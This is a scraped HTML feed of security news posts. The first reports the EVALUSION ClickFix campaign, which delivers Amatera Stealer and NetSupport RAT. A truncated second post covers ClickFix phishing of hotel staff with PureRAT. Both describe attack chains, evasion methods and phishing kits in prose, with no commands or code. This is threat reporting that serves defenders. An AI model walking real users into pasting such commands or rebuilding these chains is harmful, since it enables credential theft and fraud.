				<div class="et_pb_text_inner"><h3 class="premium-content">Join our <a class="green_color" href="https://www.patreon.com/posts/maximizing-your-87671900" target="_blank" rel="noopener sponsored">Patreon</a> Channel and Gain access to 70+ Exclusive Walkthrough Videos.</h3></div>
			</div><div class="et_pb_module et_pb_image et_pb_image_0">
				
				
				
				
				<a href="https://www.patreon.com/posts/create-evasive-111421720" target="_blank"><span class="et_pb_image_wrap "><img fetchpriority="high" decoding="async" width="800" height="120" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2025/02/Patreon-2.png" alt="Patreon" title="Patreon" srcset="https://www.blackhatethicalhacking.com/wp-content/uploads/2025/02/Patreon-2.png 800w, https://www.blackhatethicalhacking.com/wp-content/uploads/2025/02/Patreon-2-480x72.png 480w" sizes="(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) 800px, 100vw" class="wp-image-282931"></span></a>
			</div><div class="et_pb_module et_pb_divider et_pb_divider_0 et_pb_divider_position_ et_pb_space"><div class="et_pb_divider_internal"></div></div>
			</div>
				
				
				
				
			</div><div class="et_pb_row_inner et_pb_row_inner_3">
				<div class="et_pb_column et_pb_column_4_4 et_pb_column_inner et_pb_column_inner_3 et-last-child">
				
				
				
				
				<div class="et_pb_module et_pb_text et_pb_text_3  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner">Reading Time: 3 Minutes</div>
			</div>
			</div>
				
				
				
				
			</div><div class="et_pb_row_inner et_pb_row_inner_4">
				<div class="et_pb_column et_pb_column_4_4 et_pb_column_inner et_pb_column_inner_4 et-last-child">
				
				
				
				
				<div class="et_pb_module et_pb_text et_pb_text_4  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><h2 data-start="608" data-end="645"><strong>Overview of the EVALUSION Campaign</strong></h2>
<p data-start="647" data-end="834">Cybersecurity researchers have uncovered a new wave of <strong data-start="702" data-end="736">ClickFix-style malware attacks</strong> delivering both <strong data-start="753" data-end="772">Amatera Stealer</strong> and <strong data-start="777" data-end="795">NetSupport RAT</strong>, tracked by <a href="https://www.esentire.com/blog/evalusion-campaign-delivers-amatera-stealer-and-netsupport-rat" target="_blank" rel="noopener">eSentire</a> as <strong data-start="820" data-end="833">EVALUSION</strong>.</p>
<p data-start="836" data-end="1154">ClickFix, a fast-growing social engineering tactic, lures victims into manually running malicious commands through the Windows Run dialog under the guise of bypassing a “reCAPTCHA verification.” This approach bypasses many automated security safeguards and has become a preferred tactic for numerous malware operators.</p>
<p data-start="1156" data-end="1378">The latest activity has been observed throughout <strong data-start="1205" data-end="1221">October 2025</strong>, marking a significant expansion in the distribution of Amatera Stealer — a successor to <strong data-start="1311" data-end="1338">AcridRain (ACR) Stealer</strong> — and accompanying remote access tools.</p>
<hr data-start="1380" data-end="1383">
<h2 data-start="1385" data-end="1429"><strong>Amatera Stealer: An Evolved MaaS Platform</strong></h2>
<p data-start="1431" data-end="1625">First <a href="https://www.proofpoint.com/us/blog/threat-insight/amatera-stealer-rebranded-acr-stealer-improved-evasion-sophistication" target="_blank" rel="noopener">discovered</a> in <strong data-start="1451" data-end="1464">June 2025</strong>, <strong data-start="1466" data-end="1485">Amatera Stealer</strong> is marketed via subscription plans ranging from <strong data-start="1534" data-end="1566">$199/month up to $1,499/year</strong>, aligning with the rise of malware-as-a-service offerings.</p>
<p data-start="1627" data-end="1648"><strong>Key features include:</strong></p>
<ul>
<li data-start="1652" data-end="1697">Extensive data theft capabilities targeting
<ul>
<li>Crypto wallets</li>
<li>Web browsers</li>
<li>Messaging apps</li>
<li>Email clients</li>
<li>FTP clients</li>
</ul>
</li>
<li data-start="1799" data-end="1833">Advanced evasion methods such as
<ul>
<li data-start="1838" data-end="1915"><strong data-start="1838" data-end="1856">WoW64 SysCalls</strong> to bypass user-mode hooks used by AV, EDR, and sandboxes</li>
</ul>
</li>
<li data-start="1918" data-end="2006">DLL payloads packed with <strong data-start="1943" data-end="1958">PureCrypter</strong>, a crypter/loader also sold as a MaaS product</li>
</ul>
<p data-start="2008" data-end="2251">Once executed, the stealer DLL is injected into the legitimate <strong data-start="2071" data-end="2086">MSBuild.exe</strong> process to steal credentials and sensitive information. It then issues PowerShell commands to download <strong data-start="2190" data-end="2208">NetSupport RAT</strong> — but only if the victim appears valuable.</p>
<p data-start="2008" data-end="2251"><img decoding="async" class="aligncenter" src="https://esentire-dot-com-assets.s3.amazonaws.com/assetsV3/Blog/Blog-Images/EVALUSION-Campaign-Delivers-Amatera-3.png" alt="Attack chain leading to Amatera and NetSupport RAT" width="756" height="803">Figure 3 – Attack chain leading to Amatera and NetSupport RAT</p></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_5 see-also-text  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><strong>See Also: So, you want to be a hacker?<br>
</strong><strong><a href="https://www.blackhatethicalhacking.com/courses/" target="_blank" rel="noopener noreferrer">Offensive Security, Bug Bounty Courses</a></strong></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_6  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><br>
<!-- News_Horizontal_smaller --><br>
<ins class="adsbygoogle" data-ad-client="ca-pub-6620833063853657" data-ad-slot="8337846400"></ins><br>
</div>
			</div><div class="et_pb_module et_pb_text et_pb_text_7  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><h4><span><strong>Discover your weakest link. Be proactive, not reactive. Cybercriminals need just one flaw to strike.</strong></span></h4>
<p><a href="https://www.blackhatethicalhacking.com/solutions/"><img decoding="async" class="alignnone wp-image-276050 size-full" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2023/11/Solutions.png" alt="" width="800" height="120" srcset="https://www.blackhatethicalhacking.com/wp-content/uploads/2023/11/Solutions.png 800w, https://www.blackhatethicalhacking.com/wp-content/uploads/2023/11/Solutions-480x72.png 480w" sizes="(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) 800px, 100vw"></a></p></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_8  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><h2 data-start="2258" data-end="2320"><strong>Targeting Logic: Only High-Value Victims Get NetSupport RAT</strong></h2>
<p data-start="2322" data-end="2382">eSentire’s analysis highlights a clever filtering mechanism:</p>
<blockquote data-start="2384" data-end="2547">
<p data-start="2386" data-end="2547">If the infected endpoint <strong data-start="2411" data-end="2435">is not domain-joined</strong> and <strong data-start="2440" data-end="2500">does not contain files of financial or operational value</strong>, Amatera does <strong data-start="2515" data-end="2546">not download NetSupport RAT</strong>.</p>
</blockquote>
<p data-start="2549" data-end="2681">This avoids wasting resources and reduces noise that could alert defenders, focusing efforts on victims most likely to yield profit.</p>
<hr data-start="2683" data-end="2686">
<h2 data-start="2688" data-end="2720"><strong>How the ClickFix Attack Works</strong></h2>
<p data-start="2722" data-end="2779">The attack chain mirrors other ClickFix-driven campaigns:</p>
<ol>
<li data-start="2784" data-end="2854">User is shown a <strong data-start="2800" data-end="2816">fake CAPTCHA</strong> or Cloudflare Turnstile-style page.</li>
<li data-start="2858" data-end="2939">The page instructs them to <strong data-start="2885" data-end="2916">open the Windows Run dialog</strong> and paste a command.</li>
<li data-start="2943" data-end="3022">Executing the command triggers <strong data-start="2974" data-end="2987">mshta.exe</strong>, which runs a PowerShell loader.</li>
<li data-start="3026" data-end="3093">The loader fetches a .NET payload (typically from <strong data-start="3076" data-end="3089">MediaFire</strong>).</li>
<li data-start="3097" data-end="3182">Amatera Stealer is installed, followed by NetSupport RAT (if the system is valuable).</li>
</ol>
<p data-start="3184" data-end="3291">This multi-stage flow allows EDR evasion while leveraging trusted Windows binaries (“living-off-the-land”).</p>
<hr data-start="3293" data-end="3296">
<h2 data-start="3298" data-end="3341"><strong>Related Malware Campaigns Using ClickFix</strong></h2>
<p data-start="3343" data-end="3445">eSentire and other vendors report a surge in ClickFix-enabled campaigns dropping a variety of malware:</p>
<h3 data-start="3447" data-end="3485"><strong data-start="3451" data-end="3485">1. XWorm via VBS Invoice Lures</strong></h3>
<ul>
<li data-start="3488" data-end="3548">Malicious VBS attachments disguise themselves as invoices.</li>
<li data-start="3551" data-end="3610">A batch file invokes PowerShell to fetch and run <strong data-start="3600" data-end="3609">XWorm</strong>.</li>
</ul>
<h3 data-start="3612" data-end="3653"><strong data-start="3616" data-end="3653">2. SmartApeSG / HANEYMANEY / ZPHP</strong></h3>
<ul>
<li data-start="3656" data-end="3707">Compromised websites inject malicious JavaScript.</li>
<li data-start="3710" data-end="3801">Victims are redirected to fake Cloudflare Turnstile checks that deliver <strong data-start="3782" data-end="3800">NetSupport RAT</strong>.</li>
</ul>
<h3 data-start="3803" data-end="3838"><strong data-start="3807" data-end="3838">3. Fake Booking.com CAPTCHA</strong></h3>
<ul>
<li data-start="3841" data-end="3871">Hospitality sector targeted.</li>
<li data-start="3874" data-end="3964">Fake CAPTCHA pages instruct users to run PowerShell commands dropping credential stealers.</li>
</ul>
<h3 data-start="3966" data-end="4011"><strong data-start="3970" data-end="4011">4. Email Delivery Notification Spoofs</strong></h3>
<ul>
<li data-start="4014" data-end="4054">Fraudulent “blocked messages” prompts.</li>
<li data-start="4057" data-end="4138">Leads victims to credential-harvesting sites designed to siphon corporate logins.</li>
</ul></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_9 see-also-text  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><p><strong>Trending: <a href="https://www.blackhatethicalhacking.com/articles/network-eavesdropping-via-man-in-the-middle-on-internal-communications/" target="_blank" rel="noopener noreferrer">Network Eavesdropping via Man-in-the-Middle on Internal Communications<br>
</a></strong></p></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_10  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><br>
<!-- News Adsense Adcode Horizontal --><br>
<ins class="adsbygoogle" data-ad-client="ca-pub-6620833063853657" data-ad-slot="8337846400"></ins><br>
</div>
			</div><div class="et_pb_module et_pb_text et_pb_text_11 see-also-text  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><p><strong>Trending: <a href="https://www.blackhatethicalhacking.com/tools/zoomeyesearch/" target="_blank" rel="noopener">Recon Tool: ZoomeyeSearch<br>
</a></strong></p></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_12  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><div class="pt-0">
<div class="gizmo-bot-avatar flex h-8 w-8 items-center justify-center overflow-hidden rounded-full">
<div class="relative p-1 rounded-sm flex items-center justify-center bg-token-main-surface-primary text-token-text-primary h-8 w-8">
<div class="flex-shrink-0 flex flex-col relative items-end">
<div class="pt-0">
<div class="gizmo-bot-avatar flex h-8 w-8 items-center justify-center overflow-hidden rounded-full">
<div class="relative p-1 rounded-sm flex items-center justify-center bg-token-main-surface-primary text-token-text-primary h-8 w-8">
<div class="flex-shrink-0 flex flex-col relative items-end">
<div class="pt-0">
<div class="gizmo-bot-avatar flex h-8 w-8 items-center justify-center overflow-hidden rounded-full">
<div class="relative p-1 rounded-sm flex items-center justify-center bg-token-main-surface-primary text-token-text-primary h-8 w-8">
<div class="pt-0">
<div class="gizmo-bot-avatar flex h-8 w-8 items-center justify-center overflow-hidden rounded-full">
<div class="relative p-1 rounded-sm flex items-center justify-center bg-token-main-surface-primary text-token-text-primary h-8 w-8">
<div class="flex-shrink-0 flex flex-col relative items-end">
<div class="pt-0">
<div class="gizmo-bot-avatar flex h-8 w-8 items-center justify-center overflow-hidden rounded-full">
<div class="relative p-1 rounded-sm flex items-center justify-center bg-token-main-surface-primary text-token-text-primary h-8 w-8">
<div class="flex-shrink-0 flex flex-col relative items-end">
<div class="pt-0">
<div class="gizmo-bot-avatar flex h-8 w-8 items-center justify-center overflow-hidden rounded-full">
<div class="relative p-1 rounded-sm flex items-center justify-center bg-token-main-surface-primary text-token-text-primary h-8 w-8">
<h2 data-start="4145" data-end="4202"><strong>Cephas &amp; Tycoon 2FA: Evolving Credential Phishing Kits</strong></h2>
<p data-start="4204" data-end="4283">A growing number of phishing kits also support ClickFix-style flows, including:</p>
<h3 data-start="4285" data-end="4299"><strong data-start="4289" data-end="4299">Cephas</strong></h3>
<ul>
<li data-start="4302" data-end="4330">Emerged in <strong data-start="4313" data-end="4328">August 2024</strong></li>
<li data-start="4333" data-end="4425">Uses an unusual obfuscation technique that inserts <strong data-start="4384" data-end="4423">random invisible Unicode characters</strong></li>
<li data-start="4428" data-end="4490">Helps evade anti-phishing scanners and disrupts YARA detection</li>
</ul>
<h3 data-start="4492" data-end="4510"><strong data-start="4496" data-end="4510">Tycoon 2FA</strong></h3>
<ul>
<li data-start="4513" data-end="4582">Intercepts authentication flows to steal credentials and 2FA tokens</li>
<li data-start="4585" data-end="4652">Used in attacks against cloud services and corporate email accounts</li>
</ul>
<p data-start="4654" data-end="4786">Barracuda <a href="https://blog.barracuda.com/2025/11/12/email-threat-radar-november-2025" target="_blank" rel="noopener">reports</a> these kits are becoming increasingly stealthy and professionalized, lowering barriers for inexperienced attackers.</p>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_13 see-also-text  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><p><strong>Trending: <a href="https://www.blackhatethicalhacking.com/news/maverick-malware-campaign-expands-whatsapp-propagated-banking-trojan-linked-to-coyote/" target="_blank" rel="noopener noreferrer">Maverick Malware Campaign Expands: WhatsApp-Propagated Banking Trojan Linked to Coyote<br>
</a></strong></p></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_14  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><blockquote><p><em>Are u a security researcher? Or a company that writes articles about Cyber Security, Offensive Security (related to information security in general) that match with our specific audience and is worth sharing? </em><em>If you want to express your idea in an article contact us here for a quote: <strong>info@blackhatethicalhacking.com</strong></em></p></blockquote></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_15  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><p><strong><em>Source: thehackernews.com, esentire.com/blog</em></strong></p>
<p><a href="https://thehackernews.com/2025/11/new-evalusion-clickfix-campaign.html" target="_blank" rel="noopener"><strong>Source Link</strong></a></p></div>
			</div><div class="et_pb_module et_pb_divider et_pb_divider_1 et_pb_divider_position_ et_pb_space"><div class="et_pb_divider_internal"></div></div><div class="et_pb_module et_pb_image et_pb_image_1 store-img">
				
				
				
				
				<a href="https://store.blackhatethicalhacking.com/" target="_blank"><span class="et_pb_image_wrap "><img decoding="async" width="1142" height="500" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2023/03/Store.png" alt="Merch" title="Store" srcset="https://www.blackhatethicalhacking.com/wp-content/uploads/2023/03/Store.png 1142w, https://www.blackhatethicalhacking.com/wp-content/uploads/2023/03/Store-980x429.png 980w, https://www.blackhatethicalhacking.com/wp-content/uploads/2023/03/Store-480x210.png 480w" sizes="(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) and (max-width: 980px) 980px, (min-width: 981px) 1142px, 100vw" class="wp-image-271829"></span></a>
			</div><div class=" et_pb_logo_slider  et_pb_logo_slider_0 ">
                
            </div>
			</div>
				
				
				
				
			</div>
			</div><div class="et_pb_column et_pb_column_1_4 et_pb_column_1    et_pb_css_mix_blend_mode_passthrough">
				
				
				
				
				<div class="et_pb_module et_pb_sidebar_0 news-sidebar1 et_pb_widget_area clearfix et_pb_widget_area_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_widget rpwe_widget recent-posts-extended"><h4 class="widgettitle">Recent News</h4><div class="rpwe-block news-recent-posts-sb"><ul class="rpwe-ul"><li class="rpwe-li rpwe-clearfix"><a class="rpwe-img" href="https://www.blackhatethicalhacking.com/news/maverick-malware-campaign-expands-whatsapp-propagated-banking-trojan-linked-to-coyote/" target="_self"><img class="rpwe-aligncenter rpwe-thumb" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2025/11/877x440-Images-for-the-News-posts-10-300x150.png" alt="Maverick Malware Campaign Expands: WhatsApp-Propagated Banking Trojan Linked to Coyote" height="150" width="300" loading="lazy" decoding="async"></a><h3 class="rpwe-title"><a href="https://www.blackhatethicalhacking.com/news/maverick-malware-campaign-expands-whatsapp-propagated-banking-trojan-linked-to-coyote/" target="_self">Maverick Malware Campaign Expands: WhatsApp-Propagated Banking Trojan Linked to Coyote</a></h3><time class="rpwe-time published" datetime="2025-11-12T11:32:57+02:00">November 12, 2025</time><div class="rpwe-summary"></div></li><li class="rpwe-li rpwe-clearfix"><a class="rpwe-img" href="https://www.blackhatethicalhacking.com/news/hotel-managers-targeted-by-clickfix-phishing-purerat-used-to-harvest-booking-com-credentials/" target="_self"><img class="rpwe-aligncenter rpwe-thumb" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2025/11/877x440-Images-for-the-News-posts-29-300x150.png" alt="Hotel Managers Targeted by ClickFix Phishing – PureRAT Used to Harvest Booking.com Credentials" height="150" width="300" loading="lazy" decoding="async"></a><h3 class="rpwe-title"><a href="https://www.blackhatethicalhacking.com/news/hotel-managers-targeted-by-clickfix-phishing-purerat-used-to-harvest-booking-com-credentials/" target="_self">Hotel Managers Targeted by ClickFix Phishing – PureRAT Used to Harvest Booking.com Credentials</a></h3><time class="rpwe-time published" datetime="2025-11-11T12:38:25+02:00">November 11, 2025</time><div class="rpwe-summary"></div></li><li class="rpwe-li rpwe-clearfix"><a class="rpwe-img" href="https://www.blackhatethicalhacking.com/news/freight-brokers-hit-by-rmm-based-cyber-attacks-aimed-at-physical-cargo-theft/" target="_self"><img class="rpwe-aligncenter rpwe-thumb" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2025/11/877x440-Images-for-the-News-posts-28-300x150.png" alt="Freight Brokers Hit by RMM-Based Cyber Attacks Aimed at Physical Cargo Theft" height="150" width="300" loading="lazy" decoding="async"></a><h3 class="rpwe-title"><a href="https://www.blackhatethicalhacking.com/news/freight-brokers-hit-by-rmm-based-cyber-attacks-aimed-at-physical-cargo-theft/" target="_self">Freight Brokers Hit by RMM-Based Cyber Attacks Aimed at Physical Cargo Theft</a></h3><time class="rpwe-time published" datetime="2025-11-04T11:45:21+02:00">November 4, 2025</time><div class="rpwe-summary"></div></li><li class="rpwe-li rpwe-clearfix"><a class="rpwe-img" href="https://www.blackhatethicalhacking.com/news/adaptixc2-open-source-c2-tool-gains-traction-with-ransomware-linked-actors/" target="_self"><img class="rpwe-aligncenter rpwe-thumb" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2025/10/877x440-Images-for-the-News-posts-36-300x150.png" alt="AdaptixC2: Open-Source C2 Tool Gains Traction with Ransomware-Linked Actors" height="150" width="300" loading="lazy" decoding="async"></a><h3 class="rpwe-title"><a href="https://www.blackhatethicalhacking.com/news/adaptixc2-open-source-c2-tool-gains-traction-with-ransomware-linked-actors/" target="_self">AdaptixC2: Open-Source C2 Tool Gains Traction with Ransomware-Linked Actors</a></h3><time class="rpwe-time published" datetime="2025-10-31T12:10:45+02:00">October 31, 2025</time><div class="rpwe-summary"></div></li></ul></div><!-- Generated by http://wordpress.org/plugins/recent-posts-widget-extended/ --></div><div class="et_pb_widget widget_block"><h3>EXPLORE OUR STORE</h3></div><div class="et_pb_widget widget_media_image"><a href="https://store.blackhatethicalhacking.com/"><img decoding="async" width="233" height="300" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2024/09/Tshirt-233x300.png" class="image wp-image-280999  attachment-medium size-medium" alt=""></a></div><div class="et_pb_widget widget_media_image"><a href="https://store.blackhatethicalhacking.com/"><img decoding="async" width="300" height="280" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2024/09/RedTeamers-e1725807706904-300x280.png" class="image wp-image-281001  attachment-medium size-medium" alt=""></a></div><div class="et_pb_widget widget_media_image"><a href="https://store.blackhatethicalhacking.com/"><img decoding="async" width="711" height="1024" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2024/09/Hoodie-711x1024.png" class="image wp-image-281002  attachment-large size-large" alt=""></a></div><div class="widget_text et_pb_widget widget_custom_html"><div class="textwidget custom-html-widget"> <!-- News Adsense Adcode --> <ins class="adsbygoogle" data-ad-client="ca-pub-6620833063853657" data-ad-slot="8337846400" data-ad-format="auto" data-full-width-responsive="true"></ins> </div></div>
			</div><div class="et_pb_module et_pb_sidebar_1 news-sidebar2 et_animated et_pb_widget_area clearfix et_pb_widget_area_left  et_pb_text_align_justified et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_widget widget_block"><a href="https://www.blackhatethicalhacking.com/courses/"><img decoding="async" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2022/06/OffSec-Course.png"></a>
<h3>Offensive Security &amp; Ethical Hacking Course</h3>
<p>Begin the learning curve of hacking now!</p>
</div><div class="et_pb_widget widget_block"><hr>
<a href="https://www.blackhatethicalhacking.com/solutions/"><img decoding="async" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2023/03/Solutions.png"></a>
<h3>Information Security Solutions</h3>
<p>Find out how Pentesting Services can help you.</p></div><div class="et_pb_widget widget_block"><hr>
<a href="https://discord.gg/EYMqveWXkv"><img decoding="async" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2023/10/Discord.png"></a>
<h3>Join our Community</h3></div>
			</div>
			</div>
				</div>
				
			</div>The post <a href="https://www.blackhatethicalhacking.com/news/new-clickfix-campaign-evalusion-deploys-amatera-stealer-and-netsupport-rat/">New ClickFix Campaign “EVALUSION” Deploys Amatera Stealer and NetSupport RAT</a> first appeared on <a href="https://www.blackhatethicalhacking.com/">Black Hat Ethical Hacking</a>.]]></content:encoded>
</item>
<item>
<title><![CDATA[Hotel Managers Targeted by ClickFix Phishing – PureRAT Used to Harvest Booking.com Credentials]]></title>
<description><![CDATA[Hotel Managers Targeted by ClickFix Phishing – PureRAT Used to Harvest Booking.com Credentials
				
				
			
			
				
				
				
				
			
				
				
				
				
				
				
				
				
				
				
				
				 Post Views: 3
			
			
				
				
				
				
				



			
			
				
				
				
				
			
				
				
				
	...]]></description>
<link>https://tsecurity.de/de/3091399/hacking/hotel-managers-targeted-by-clickfix-phishing-purerat-used-to-harvest-bookingcom-credentials/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3091399/hacking/hotel-managers-targeted-by-clickfix-phishing-purerat-used-to-harvest-bookingcom-credentials/</guid>
<pubDate>Tue, 11 Nov 2025 11:53:24 +0100</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="et_pb_section et_pb_section_0 et_section_specialty">
				
				
				
				
				
				<div class="et_pb_row">
				<div class="et_pb_column et_pb_column_3_4 et_pb_column_0   et_pb_specialty_column  et_pb_css_mix_blend_mode_passthrough">
				
				
				
				
				<div class="et_pb_row_inner et_pb_row_inner_0">
				<div class="et_pb_column et_pb_column_4_4 et_pb_column_inner et_pb_column_inner_0 et-last-child">
				
				
				
				
				<div class="et_pb_module et_pb_post_title et_pb_post_title_0 et_pb_bg_layout_light  et_pb_text_align_left">
				
				
				
				
				
				<div class="et_pb_title_container">
					<h1 class="entry-title">Hotel Managers Targeted by ClickFix Phishing – PureRAT Used to Harvest Booking.com Credentials</h1>
				</div>
				
			</div>
			</div>
				
				
				
				
			</div><div class="et_pb_row_inner et_pb_row_inner_1">
				<div class="et_pb_column et_pb_column_4_4 et_pb_column_inner et_pb_column_inner_1 et-last-child">
				
				
				
				
				<div class="et_pb_module et_pb_text et_pb_text_0  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><p><strong><div class="post-views content-post post-286680 entry-meta load-static">
				<span class="post-views-icon dashicons dashicons-chart-bar"></span> <span class="post-views-label">Post Views:</span> <span class="post-views-count">3</span>
			</div></strong></p></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_1  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><br>
<!-- News_Horizontal_smaller --><br>
<ins class="adsbygoogle" data-ad-client="ca-pub-6620833063853657" data-ad-slot="8337846400"></ins><br>
</div>
			</div>
			</div>
				
				
				
				
			</div><div class="et_pb_row_inner et_pb_row_inner_2 patreon-row">
				<div class="et_pb_column et_pb_column_4_4 et_pb_column_inner et_pb_column_inner_2 et-last-child">
				
				
				
				
				<div class="et_pb_module et_pb_text et_pb_text_2  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><h3 class="premium-content">Join our <a class="green_color" href="https://www.patreon.com/posts/maximizing-your-87671900" target="_blank" rel="noopener sponsored">Patreon</a> Channel and Gain access to 70+ Exclusive Walkthrough Videos.</h3></div>
			</div><div class="et_pb_module et_pb_image et_pb_image_0">
				
				
				
				
				<a href="https://www.patreon.com/posts/create-evasive-111421720" target="_blank"><span class="et_pb_image_wrap "><img fetchpriority="high" decoding="async" width="800" height="120" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2025/02/Patreon-2.png" alt="Patreon" title="Patreon" srcset="https://www.blackhatethicalhacking.com/wp-content/uploads/2025/02/Patreon-2.png 800w, https://www.blackhatethicalhacking.com/wp-content/uploads/2025/02/Patreon-2-480x72.png 480w" sizes="(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) 800px, 100vw" class="wp-image-282931"></span></a>
			</div><div class="et_pb_module et_pb_divider et_pb_divider_0 et_pb_divider_position_ et_pb_space"><div class="et_pb_divider_internal"></div></div>
			</div>
				
				
				
				
			</div><div class="et_pb_row_inner et_pb_row_inner_3">
				<div class="et_pb_column et_pb_column_4_4 et_pb_column_inner et_pb_column_inner_3 et-last-child">
				
				
				
				
				<div class="et_pb_module et_pb_text et_pb_text_3  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner">Reading Time: 3 Minutes</div>
			</div>
			</div>
				
				
				
				
			</div><div class="et_pb_row_inner et_pb_row_inner_4">
				<div class="et_pb_column et_pb_column_4_4 et_pb_column_inner et_pb_column_inner_4 et-last-child">
				
				
				
				
				<div class="et_pb_module et_pb_text et_pb_text_4  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><h2 data-start="640" data-end="660"><strong>Campaign overview</strong></h2>
<p data-start="662" data-end="1275">Security researchers have exposed an ongoing, large-scale phishing campaign aimed at the <strong data-start="751" data-end="773">hospitality sector</strong> that lures hotel staff and guests to <strong data-start="811" data-end="829">ClickFix-style</strong> pages impersonating major booking platforms (Booking.com, Expedia) and deploys malware such as <strong data-start="925" data-end="944">PureRAT (zgRAT)</strong> to steal credentials and enable fraud. The operator activity has been active since at least <strong data-start="1037" data-end="1051">April 2025</strong> and remained operational into <strong data-start="1082" data-end="1098">October 2025</strong>, according to <a href="https://blog.sekoia.io/phishing-campaigns-i-paid-twice-targeting-booking-com-hotels-and-customers/" target="_blank" rel="noopener">Sekoia</a>, which analyzed the latest wave. The attackers’ goal is to obtain booking-platform admin credentials and payment/card details for resale or direct fraud.</p>
<hr data-start="1277" data-end="1280">
<h2 data-start="1282" data-end="1310"><strong>Attack chain (high level)</strong></h2>
<p data-start="1312" data-end="1380">The campaigns follow a consistent social-engineering + malware flow:</p>
<ul>
<li data-start="1384" data-end="1562"><strong data-start="1384" data-end="1418">Initial compromise / spoofing:</strong> Attackers use a compromised email account to send spear-phishing messages to hotel admins or hijack legitimate booking-related email threads.</li>
<li data-start="1565" data-end="1754"><strong data-start="1565" data-end="1599">Redirection to ClickFix pages:</strong> Targets are directed via a URL chain to a fraudulent “ClickFix” verification page that looks like a reCAPTCHA or security check for Booking.com/Expedia.</li>
<li data-start="1757" data-end="1981"><strong data-start="1757" data-end="1796">Clipboard &amp; run social engineering:</strong> The bogus page often adapts to the victim’s OS, auto-copies a PowerShell command to the clipboard, and instructs the user to paste/run it (clipboard-hijacking + OS-specific prompts).</li>
<li data-start="1984" data-end="2176"><strong data-start="1984" data-end="2019">Payload download &amp; persistence:</strong> The command downloads a ZIP containing a binary that side-loads a DLL; the DLL loads <strong data-start="2105" data-end="2122">PureRAT/zgRAT</strong> via DLL sideloading and sets persistence (Run key).</li>
<li data-start="2179" data-end="2427"><strong data-start="2179" data-end="2201">Post-exploitation:</strong> The operators harvest credentials (extranet accounts, cookies), deploy infostealers, set up remote access, and use stolen credentials to access booking platforms or send fraudulent reservation/verification messages to guests.</li>
</ul>
<p> </p>
<p><img decoding="async" class="aligncenter" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwI3T0LDbc03XG9UVWZdXd1__ZoPVoIWF9E9nEgsjX-RrFvK4gH37SawL52jpV3aNZIpO1a2yGkKoJtf0NNGu6Cn_F5L8k_ToOGYtPqZiV_Fx8IXOg2x5L8mnNbRNtHGkSDjpvUKGpBHNmKDL-HpqneouBeDTUotqioftmgTEZix1iqTXzA0ir2lKpGLOD/s2800/sek.png" width="972" height="656"></p></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_5 see-also-text  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><strong>See Also: So, you want to be a hacker?<br>
</strong><strong><a href="https://www.blackhatethicalhacking.com/courses/" target="_blank" rel="noopener noreferrer">Offensive Security, Bug Bounty Courses</a></strong></div>
